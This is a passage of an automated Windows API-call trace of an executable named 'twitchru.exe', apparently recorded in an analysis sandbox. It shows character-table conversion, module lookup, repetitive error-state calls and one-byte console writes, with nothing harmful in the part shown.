lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x46\xa3\xa3\x68\x94\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0219.171] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x440650, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.172] SetLastError (dwErrCode=0x0) [0219.172] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.173] SetLastError (dwErrCode=0x0) [0219.173] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.174] GetLastError () returned 0x0 [0219.174] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.175] SetLastError (dwErrCode=0x0) [0219.175] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.176] SetLastError (dwErrCode=0x0) [0219.176] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.177] SetLastError (dwErrCode=0x0) [0219.177] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.178] GetLastError () returned 0x0 [0219.178] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.179] GetLastError () returned 0x0 [0219.179] SetLastError (dwErrCode=0x0) [0219.181] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76870000 [0219.181] GetProcAddress (hModule=0x76870000, lpProcName="IsProcessorFeaturePresent") returned 0x76889680 [0219.181] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0219.183] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x427e10) returned 0x0 [0219.186] GetLastError () returned 0x0 [0219.186] SetLastError (dwErrCode=0x0) [0219.186] GetLastError () returned 0x0 [0219.186] SetLastError (dwErrCode=0x0) [0219.187] GetLastError () returned 0x0 [0219.187] SetLastError (dwErrCode=0x0) [0219.187] GetLastError () returned 0x0 [0219.187] SetLastError (dwErrCode=0x0) [0219.187] GetLastError () returned 0x0 [0219.187] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.188] GetLastError () returned 0x0 [0219.188] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.192] GetLastError () returned 0x0 [0219.192] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.193] GetLastError () returned 0x0 [0219.193] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.194] SetLastError (dwErrCode=0x0) [0219.194] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.195] SetLastError (dwErrCode=0x0) [0219.195] GetLastError () returned 0x0 [0219.196] SetLastError (dwErrCode=0x0) [0219.197] GetLastError () returned 0x0 [0219.197] SetLastError (dwErrCode=0x0) [0219.197] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.198] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.212] GetLastError () returned 0x0 [0219.212] SetLastError (dwErrCode=0x0) [0219.212] GetLastError () returned 0x0 [0219.212] SetLastError (dwErrCode=0x0) [0219.212] GetLastError () returned 0x0 [0219.212] SetLastError (dwErrCode=0x0) [0219.213] GetLastError () returned 0x0 [0219.213] SetLastError (dwErrCode=0x0) [0219.213] GetLastError () returned 0x0 [0219.213] SetLastError (dwErrCode=0x0) [0219.213] GetLastError () returned 0x0 [0219.213] SetLastError (dwErrCode=0x0) [0219.214] GetLastError () returned 0x0 [0219.214] SetLastError (dwErrCode=0x0) [0219.214] GetLastError () returned 0x0 [0219.214] SetLastError (dwErrCode=0x0) [0219.214] GetLastError () returned 0x0 [0219.214] SetLastError (dwErrCode=0x0) [0219.214] GetLastError () returned 0x0 [0219.214] SetLastError (dwErrCode=0x0) [0219.214] GetLastError () returned 0x0 [0219.214] SetLastError (dwErrCode=0x0) [0219.215] GetLastError () returned 0x0 [0219.215] SetLastError (dwErrCode=0x0) [0219.215] GetLastError () returned 0x0 [0219.215] SetLastError (dwErrCode=0x0) [0219.215] GetLastError () returned 0x0 [0219.215] SetLastError (dwErrCode=0x0) [0219.219] GetLastError () returned 0x0 [0219.219] SetLastError (dwErrCode=0x0) [0219.219] GetLastError () returned 0x0 [0219.219] SetLastError (dwErrCode=0x0) [0219.219] GetLastError () returned 0x0 [0219.219] SetLastError (dwErrCode=0x0) [0219.219] GetLastError () returned 0x0 [0219.219] SetLastError (dwErrCode=0x0) [0219.219] GetLastError () returned 0x0 [0219.219] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.220] SetLastError (dwErrCode=0x0) [0219.220] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.221] GetLastError () returned 0x0 [0219.221] SetLastError (dwErrCode=0x0) [0219.222] GetLastError () returned 0x0 [0219.222] SetLastError (dwErrCode=0x0) [0219.222] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.222] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.232] GetLastError () returned 0x0 [0219.233] SetLastError (dwErrCode=0x0) [0219.233] GetLastError () returned 0x0 [0219.233] SetLastError (dwErrCode=0x0) [0219.233] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.234] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.235] GetLastError () returned 0x0 [0219.235] SetLastError (dwErrCode=0x0) [0219.235] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.236] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.236] GetLastError () returned 0x0 [0219.237] SetLastError (dwErrCode=0x0) [0219.237] GetLastError () returned 0x0 [0219.237] SetLastError (dwErrCode=0x0) [0219.237] GetLastError () returned 0x0 [0219.237] SetLastError (dwErrCode=0x0) [0219.237] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.238] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.238] GetLastError () returned 0x0 [0219.238] SetLastError (dwErrCode=0x0) [0219.238] GetLastError () returned 0x0 [0219.238] SetLastError (dwErrCode=0x0) [0219.239] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.239] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.240] GetLastError () returned 0x0 [0219.240] SetLastError (dwErrCode=0x0) [0219.240] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.240] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.241] GetLastError () returned 0x0 [0219.241] SetLastError (dwErrCode=0x0) [0219.241] GetLastError () returned 0x0 [0219.241] SetLastError (dwErrCode=0x0) [0219.241] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0b4 | out: lpMode=0x19e0b4) returned 1 [0219.241] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0c4, lpOverlapped=0x0 | out: lpBuffer=0x19e0e0*, lpNumberOfBytesWritten=0x19e0c4*=0x1, lpOverlapped=0x0) returned 1 [0219.242] GetLastError () returned 0x0 [0219.242] SetLastError (dwErrCode=0x0) [0219.242] GetLastError () returned 0x0 [0219.242] SetLastError (dwErrCode=0x0) [0219.243] GetLastError () returned 0x0 [0219.243] SetLastError (dwErrCode=0x0) [0219.243] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df30 | out: lpMode=0x19df30) returned 1 [0219.243] WriteFile (in: hFile=0x3c, lpBuffer=0x19df5c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df40, lpOverlapped=0x0 | out: lpBuffer=0x19df5c*, lpNumberOfBytesWritten=0x19df40*=0x1, lpOverlapped=0x0) returned 1 [0219.244] GetLastError () returned 0x0 [0219.244] SetLastError (dwErrCode=0x0) [0219.244] GetLastError () returned 0x0 [0219.244] SetLastError (dwErrCode=0x0) [0219.244] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.245] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.245] GetLastError () returned 0x0 [0219.246] SetLastError (dwErrCode=0x0) [0219.246] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0bc | out: lpMode=0x19e0bc) returned 1 [0219.246] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0e8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0cc, lpOverlapped=0x0 | out: lpBuffer=0x19e0e8*, lpNumberOfBytesWritten=0x19e0cc*=0x1, lpOverlapped=0x0) returned 1 [0219.249] GetLastError () returned 0x0 [0219.249] SetLastError (dwErrCode=0x0) [0219.250] GetLastError () returned 0x0 [0219.250] SetLastError (dwErrCode=0x0) [0219.250] GetLastError () returned 0x0 [0219.250] SetLastError (dwErrCode=0x0) [0219.250] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.250] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.251] GetLastError () returned 0x0 [0219.251] SetLastError (dwErrCode=0x0) [0219.251] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.252] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.253] GetLastError () returned 0x0 [0219.253] SetLastError (dwErrCode=0x0) [0219.253] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19df38 | out: lpMode=0x19df38) returned 1 [0219.253] WriteFile (in: hFile=0x3c, lpBuffer=0x19df64*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19df48, lpOverlapped=0x0 | out: lpBuffer=0x19df64*, lpNumberOfBytesWritten=0x19df48*=0x1, lpOverlapped=0x0) returned 1 [0219.254] GetLastError () returned 0x0 [0219.254] SetLastError (dwErrCode=0x0) [0219.254] GetLastError () returned 0x0 [0219.254] SetLastError (dwErrCode=0x0) [0219.254] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.254] WriteFile (in: hFile=0x3c, lpBuffer=0x19e0f0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e0d4, lpOverlapped=0x0 | out: lpBuffer=0x19e0f0*, lpNumberOfBytesWritten=0x19e0d4*=0x1, lpOverlapped=0x0) returned 1 [0219.255] GetLastError () returned 0x0 [0219.255] SetLastError (dwErrCode=0x0) [0219.255] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e0c4 | out: lpMode=0x19e0c4) returned 1 [0219.256] 